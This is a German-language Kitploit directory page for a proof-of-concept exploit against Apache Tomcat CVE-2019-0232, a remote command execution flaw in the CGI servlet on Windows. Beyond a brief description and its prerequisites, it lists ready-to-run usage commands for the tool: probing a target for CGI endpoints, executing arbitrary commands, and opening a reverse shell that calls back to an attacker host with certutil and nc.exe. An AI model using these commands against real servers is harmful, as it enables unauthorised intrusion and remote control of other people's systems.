Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit | Kitploit
Tools/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Windows-Batch-Skript-Injection über Abfragezeichenfolgen-Argumente

Beschreibung

Apache Tomcat mit aktiviertem CGI-Servlet und enableCmdLineArguments=true übergibt Abfragezeichenfolgen-Parameter als Befehlszeilenargumente an CGI-Skripte. Unter Windows interpretieren Batch-Dateien (.bat/.cmd) & als Befehlsseparator, was die Ausführung beliebiger Befehle über eine präparierte URL ermöglicht.

Voraussetzungen

  • CGI-Servlet in conf/web.xml oder WEB-INF/web.xml aktiviert
  • enableCmdLineArguments=true in den Init-Parametern des CGI-Servlets
  • Ein CGI-Skript (z. B. ism.bat) bereitgestellt und erreichbar
  • Windows-Ziel (Batch-Dateien sind für die &-Injektion erforderlich)

Verwendung

root@kitploit:~
git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt

Prüfen, ob ein CGI-Endpunkt existiert:

root@kitploit:~
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat

Einen Befehl ausführen:

root@kitploit:~
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'

Reverse Shell (2-stufig certutil + nc.exe):

root@kitploit:~
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444

Anforderungen

  • Python 3.8+
  • requests
  • Windows-Ziel (Schwachstelle ist betriebssystemspezifisch)
Tool herunterladen